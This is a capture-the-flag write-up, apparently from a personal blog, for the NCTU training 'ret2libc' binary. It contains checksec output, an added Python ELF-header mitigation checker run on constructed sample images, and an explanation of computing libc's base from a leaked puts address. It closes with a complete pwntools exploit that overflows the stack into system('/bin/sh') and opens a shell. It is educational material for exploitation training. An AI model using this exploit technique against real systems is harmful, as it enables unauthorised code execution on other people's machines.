臺灣交通大學 (NCTU) train.cs.nctu.edu.tw - ret2libc Writeup

Inspecting the binary:

checksec
File:     /home/zhailin/365-Days-Get-ISCAS-Internship/week1/ret2libc/ret2libc3/train.cs.nctu.edu.tw/ret2libc/ret2libc
Arch:     i386
RELRO:      Partial RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        No PIE (0x8048000)
Stripped:   No
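The checksec line above is read straight out of the ELF headers: NX comes from the flags of the PT_GNU_STACK program header, PIE from the e_type field, and RELRO from the presence of a PT_GNU_RELRO segment. The following is an added example (not part of the original writeup) that performs that header-level check in plain Python with struct. The three ELF images it inspects are constructed in-line as test input and are not loadable programs; CHALLENGE_LIKE is built to mirror the checksec result shown above (i386, No PIE, NX enabled, Partial RELRO).

```python
import struct

# ELF constants (values from the ELF specification / <elf.h>)
ET_EXEC, ET_DYN = 2, 3
EM_386 = 3
PT_LOAD = 1
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4

EHDR = struct.Struct("<16sHHIIIIIHHHHHH")   # Elf32_Ehdr, little-endian (52 bytes)
PHDR = struct.Struct("<IIIIIIII")           # Elf32_Phdr (32 bytes)


def build_elf32(e_type, phdrs):
    """Build a constructed, minimal ELF32 image: header plus program headers.

    This is test input for the inspector below, not a loadable program.
    phdrs is a list of (p_type, offset, vaddr, paddr, filesz, memsz, flags, align).
    """
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS32, LE, v1, SysV
    ehdr = EHDR.pack(ident, e_type, EM_386, 1, 0x8048000, EHDR.size, 0, 0,
                     EHDR.size, PHDR.size, len(phdrs), 40, 0, 0)
    return ehdr + b"".join(PHDR.pack(*p) for p in phdrs)


def elf_mitigations(blob):
    """Report NX / PIE / RELRO for a little-endian ELF32 image from its headers.

    RELRO is reported as "partial" whenever PT_GNU_RELRO exists; full RELRO also
    needs DT_BIND_NOW in the dynamic section, which this header-only check skips.
    Stack canaries are a symbol-table question (__stack_chk_fail) and are not covered.
    """
    if blob[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if blob[4] != 1 or blob[5] != 1:
        raise ValueError("only little-endian ELF32 is handled here")
    (_, e_type, e_machine, _, _, phoff, _, _, _,
     phentsize, phnum, _, _, _) = EHDR.unpack_from(blob, 0)

    stack_flags = None
    has_relro = False
    for i in range(phnum):
        fields = PHDR.unpack_from(blob, phoff + i * phentsize)
        p_type, p_flags = fields[0], fields[6]
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
        elif p_type == PT_GNU_RELRO:
            has_relro = True

    # No PT_GNU_STACK at all means the kernel falls back to an executable stack,
    # so NX is only "enabled" when the header exists and lacks PF_X.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    return {
        "arch": "i386" if e_machine == EM_386 else hex(e_machine),
        "nx": nx,
        "pie": e_type == ET_DYN,
        "relro": "partial" if has_relro else "none",
    }


# Constructed sample segments and images (not real binaries).
_TEXT = (PT_LOAD, 0, 0x8048000, 0x8048000, 0x1000, 0x1000, PF_R | PF_X, 0x1000)
_RELRO = (PT_GNU_RELRO, 0xF00, 0x8049F00, 0x8049F00, 0x100, 0x100, PF_R, 1)
_STACK_RW = (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W, 0x10)
_STACK_RWX = (PT_GNU_STACK, 0, 0, 0, 0, 0, PF_R | PF_W | PF_X, 0x10)

CHALLENGE_LIKE = build_elf32(ET_EXEC, [_TEXT, _STACK_RW, _RELRO])   # mirrors the checksec above
WEAK = build_elf32(ET_EXEC, [_TEXT, _STACK_RWX])                    # executable stack, no RELRO
HARDENED = build_elf32(ET_DYN, [_TEXT, _STACK_RW, _RELRO])          # PIE on top of NX + RELRO

if __name__ == "__main__":
    for name, blob in [("challenge-like", CHALLENGE_LIKE), ("weak", WEAK), ("hardened", HARDENED)]:
        print(name, elf_mitigations(blob))
```

Running the block prints one mitigation summary per sample; the challenge-like image comes out as NX on, no PIE, partial RELRO, which is exactly why a leaked libc address is enough to compute system and why NX alone does not stop a return into libc.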

Decompiling in IDA (screenshot not preserved in this copy).

Looking at the strings: the program itself leaks the addresses of /bin/sh and puts (screenshot not preserved in this copy).

Verified in gdb (screenshot not preserved in this copy).

Next, work out the overflow offset (screenshot not preserved in this copy).

Then puts_addr - puts_offset gives the libc base address, and adding system_offset to it gives the address of system. The overflow then redirects execution to system in libc, with /bin/sh as its argument.

Exploit script

from pwn import *

ret2libc = context.binary = ELF('./ret2libc')   # also sets context to i386 for flat()

if args.get('REMOTE'):
    sh = remote('host', port)
    libc = ELF('./libc.so.6')
else:
    sh = process('./ret2libc')
    libc = ELF('/lib/i386-linux-gnu/libc.so.6')

system_offset = libc.symbols['system']
puts_offset = libc.symbols['puts']

# Receive and parse the two leaked addresses the program prints ("... is 0x...")
sh.recvuntil(b'is ')
sh_addr = int(sh.recvuntil(b'\n', drop=True), 16)
print(hex(sh_addr))

sh.recvuntil(b'is ')
puts_addr = int(sh.recvuntil(b'\n', drop=True), 16)
print(hex(puts_addr))

# Compute the system address: puts_addr - puts_offset is the libc base; add system's offset
system_addr = puts_addr - puts_offset + system_offset

# Build the payload: 0x1c bytes of padding, fake saved ebp, system, fake return address, /bin/sh pointer
payload = flat([b'a' * 0x1c, b'bbbb', system_addr, b'bbbb', sh_addr])

#gdb.attach(sh)
sh.sendline(payload)
sh.interactive()

https://zer0ptr.github.io/2025/10/04/train-cs-nctu-edu-tw-ret2libc/
Author: hakmaple
Posted on October 4, 2025